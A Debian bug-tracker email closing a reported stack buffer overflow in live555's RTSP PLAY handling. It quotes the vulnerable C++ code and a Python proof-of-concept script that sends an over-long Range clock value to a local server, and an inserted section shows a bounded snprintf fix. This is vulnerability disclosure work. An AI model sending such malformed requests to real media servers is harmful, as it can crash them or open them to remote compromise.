
Bug#964552: marked as done ([Security Issue][liblivemedia] stack buffer overflow in liblivemedia)



Your message dated Fri, 10 Jul 2020 10:54:36 +0200
with message-id <20200710085436.GB12911@ramacher.at>
and subject line Re: Bug#964552: [Security Issue][liblivemedia] stack buffer overflow in liblivemedia
has caused the Debian Bug report #964552,
regarding [Security Issue][liblivemedia] stack buffer overflow in liblivemedia
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
964552: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964552
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
Package: liblivemedia
Version: 06.25

[summary]
In the latest version of live555 mediaserver, there is a stack-based buffer overflow vulnerability when parsing the 'PLAY' command.

An attacker is able to send a sequence of malformed RTSP packets to trigger this issue. In the worst case, the media server running this service can be exploited remotely without user interaction.

[bug details]
The bug is in function RTSPServer::RTSPClientSession::handleCmd_PLAY().
It calls the sscanf function to get the absolute start time and end time as strings. This is an unsafe C function that should be handled with care.
```cpp
  } else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 && numCharsMatched3 > 0) {
    rangeStart = rangeEnd = 0.0;

    char const* utcTimes = &paramStr[numCharsMatched3];
    size_t len = strlen(utcTimes) + 1;
    char* as = new char[len];
    char* ae = new char[len];
    int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae);   /// <=== dangerous function call
    if (sscanfResult == 2) {
      absStartTime = as;
      absEndTime = ae;
    } else if (sscanfResult == 1) {
```

absStartTime and absEndTime will then be written into a stack buffer whose size is 100. Since absStart and absEnd are controllable by us, it is possible to overflow the buffer on the stack.
```cpp
  char buf[100];
  ......
  if (absStart != NULL)
  {
    // We're seeking by 'absolute' time:
    if (absEnd == NULL)
    {
      sprintf(buf, "Range: clock=%s-\r\n", absStart);
    }
    else
    {
      sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
    }
    delete[] absStart;
    delete[] absEnd;
  }
```

[proof of concept]
I've attached a python script to trigger this issue.

```python
import socket
import sys,time

s = socket.socket()
s.connect(("127.0.0.1",8554))

payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
payload += 'CSeq: 2\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\n\r\n'
s.send(payload)

time.sleep(0.1)
data = s.recv(0x10000)
print(data)

payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0 \r\nCSeq: 3 \r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29) \r\nAccept: application/sdp\r\n\r\n'

s.send(payload)
time.sleep(0.1)
print(s.recv(0x10000))

payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq: 4\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\nTra$sport: RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
s.send(payload)
time.sleep(0.1)
res = s.recv(0x10000)
print(res)

payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq: 7\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\nSession: %s\r\n\r\nRange: clock = 0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n' % sessionId
s.send(payload)
time.sleep(0.1)
print(s.recv(0x10000))

while True:
    pass
```

Best Regards,
Xiaobo Xiang

--- End Message ---
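As an added, defender-side illustration that is not part of the report or of live555, the following C++ shows a bounded replacement for the sprintf() into the 100-byte stack buffer described above: snprintf() with an explicit fit check, so an over-long client-supplied clock value is rejected instead of written past the buffer, plus a plausibility check on the RFC 2326 UTC time format. formatClockRange, isPlausibleUtcTime, buildRangeHeader and the 64-character cap are assumptions of this example.

```cpp
#include <cstddef>
#include <cstdio>
#include <cstring>
#include <string>

// Added example (not live555 code): a bounded replacement for the
// sprintf() into a 100-byte stack buffer described in the report.
// kRangeBufSize mirrors the size of that buffer; the function names
// are hypothetical.
static const std::size_t kRangeBufSize = 100;

// Format "Range: clock=<start>-[<end>]\r\n" into out (outSize bytes).
// Returns true only when the whole line, including the terminating NUL,
// fits; otherwise out is left as an empty string and false is returned,
// so an over-long client-supplied time can never write past the buffer.
bool formatClockRange(const char* absStart, const char* absEnd,
                      char* out, std::size_t outSize) {
  if (out == nullptr || outSize == 0 || absStart == nullptr) return false;
  out[0] = '\0';

  int needed;
  if (absEnd == nullptr) {
    needed = std::snprintf(out, outSize, "Range: clock=%s-\r\n", absStart);
  } else {
    needed = std::snprintf(out, outSize, "Range: clock=%s-%s\r\n",
                           absStart, absEnd);
  }

  // snprintf() never writes more than outSize bytes, but it reports the
  // length the untruncated line would have had. A value >= outSize means
  // the output was truncated, which we treat as a rejected request rather
  // than silently sending a mangled header.
  if (needed < 0 || static_cast<std::size_t>(needed) >= outSize) {
    out[0] = '\0';
    return false;
  }
  return true;
}

// Input check that runs before formatting: RFC 2326 "clock=" values are
// UTC times such as 19961108T143720.25Z, so a plausible value is short and
// drawn from a small character set. The 64-byte cap is an assumption of
// this example, not a limit taken from the report.
bool isPlausibleUtcTime(const char* s) {
  if (s == nullptr) return false;
  std::size_t n = std::strlen(s);
  if (n == 0 || n > 64) return false;
  for (std::size_t i = 0; i < n; ++i) {
    char c = s[i];
    bool ok = (c >= '0' && c <= '9') || c == 'T' || c == 'Z' || c == '.';
    if (!ok) return false;
  }
  return true;
}

// Convenience wrapper with the same 100-byte buffer size as the original.
// Returns the header line, or an empty string when the input is rejected.
std::string buildRangeHeader(const std::string& absStart, const char* absEnd) {
  if (!isPlausibleUtcTime(absStart.c_str())) return "";
  if (absEnd != nullptr && !isPlausibleUtcTime(absEnd)) return "";
  char buf[kRangeBufSize];
  if (!formatClockRange(absStart.c_str(), absEnd, buf, sizeof buf)) return "";
  return std::string(buf);
}
```

With these two checks in place, a Range value of the shape shown in the proof of concept (a 100-plus-digit start time) is refused at the plausibility check, and even a value that passes it cannot exceed the buffer because snprintf() is bounded by sizeof buf.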
--- Begin Message ---
Hi

On 2020-07-09 12:13:49, Xiaobo Xiang wrote:
> Hello,
> 
> The affected version is the latest upstream version, I've just reported it
> upstream via their official maillist. Thanks for reminding me.

Thanks! I am closing the Debian bug report as this affects a version
that is not yet available in Debian.

Cheers

> 
> Thanks,
> Xiaobo Xiang
> 
> Sebastian Ramacher <sramacher@debian.org> wrote on Thursday, 9 July 2020 at 2:53 AM:
> 
> > Control: tags -1 + moreinfo
> >
> > Hi
> >
> > On 2020-07-08 23:21:30 +0800, Xiaobo Xiang wrote:
> > > Package: liblivemedia
> > > Version: 06.25
> > >
> > > [summary]
> > > In the latest version of live555 mediaserver, there is a stack based
> > buffer
> > > overflow vulnerability when parsing 'PLAY' command.
> >
> > Which version do you mean? The current version in Debian is 2020.01.19.
> > The latest upstream version is 2020.06.25. Do you mean the latter? Have
> > you reported this issue upstream? See http://www.live555.com/liveMedia/
> > for ways to contact the upstream developer.
> >
> > Cheers
> >
> > >
> > > An attacker is able to send a sequence of malformed RTSP packets to
> > trigger
> > > this issue. In the worst case, the media server running this service can
> > be
> > > exploited remotely without user interaction.
> > >
> > > [bug details]
> > > The bug is in function RTSPServer::RTSPClientSession::handleCmd_PLAY().
> > > It calls a sscanf function to get absolute start time and end time as
> > > strings. This is an unsafe c function that should be taken good care of.
> > > ```cpp
> > >   } else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 &&
> > > numCharsMatched3 > 0) {
> > >     rangeStart = rangeEnd = 0.0;
> > >
> > >     char const* utcTimes = &paramStr[numCharsMatched3];
> > >     size_t len = strlen(utcTimes) + 1;
> > >     char* as = new char[len];
> > >     char* ae = new char[len];
> > >     int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae);   ///
> > > <=== dangerous function call
> > >     if (sscanfResult == 2) {
> > >       absStartTime = as;
> > >       absEndTime = ae;
> > >     } else if (sscanfResult == 1) {
> > > ```
> > >
> > > The absStartTime and absEndTime will then be filled into a buffer in the
> > > stack whose size is 100. While the absStart and absEnd are controllable
> > by
> > > us, so it is possible to overflow the buffer in the stack.
> > > ```cpp
> > >   char buf[100];
> > >   ......
> > >   if (absStart != NULL)
> > >   {
> > >     // We're seeking by 'absolute' time:
> > >     if (absEnd == NULL)
> > >     {
> > >       sprintf(buf, "Range: clock=%s-\r\n", absStart);
> > >     }
> > >     else
> > >     {
> > >       sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
> > >     }
> > >     delete[] absStart;
> > >     delete[] absEnd;
> > >   }
> > > ```
> > >
> > > [proof of concept]
> > > I've attached a python script to trigger this issue.
> > >
> > > ```python
> > > import socket
> > > import sys,time
> > >
> > > s = socket.socket()
> > > s.connect(("127.0.0.1",8554))
> > >
> > > payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
> > > payload += 'CSeq: 2\r\n'
> > > payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > > v2019.05.29)\r\n\r\n'
> > > s.send(payload)
> > >
> > > time.sleep(0.1)
> > > data = s.recv(0x10000)
> > > print(data)
> > >
> > > payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0 \r\nCSeq: 3
> > > \r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > v2019.05.29)
> > > \r\nAccep
> > > t: application/sdp\r\n\r\n'
> > >
> > > s.send(payload)
> > > time.sleep(0.1)
> > > print(s.recv(0x10000))
> > >
> > > payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1
> > RTSP/1.0\r\nCSeq:
> > > 4\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > > v2019.05.29)\r\nTra$sport:
> > RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
> > > s.send(payload)
> > > time.sleep(0.1)
> > > res = s.recv(0x10000)
> > > print(res)
> > >
> > > payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq:
> > > 7\r\nUser-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media
> > > v2019.05.29)\r\nSession: %s\r\n\r\nRange: clock =
> > >
> > 0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n'
> > > % sessionId
> > > s.send(payload)
> > > time.sleep(0.1)
> > > print(s.recv(0x10000))
> > >
> > > while True:
> > >     pass
> > > ```
> > >
> > > Best Regards,
> > > Xiaobo Xiang
> >
> > --
> > Sebastian Ramacher
> >

-- 
Sebastian Ramacher

--- End Message ---
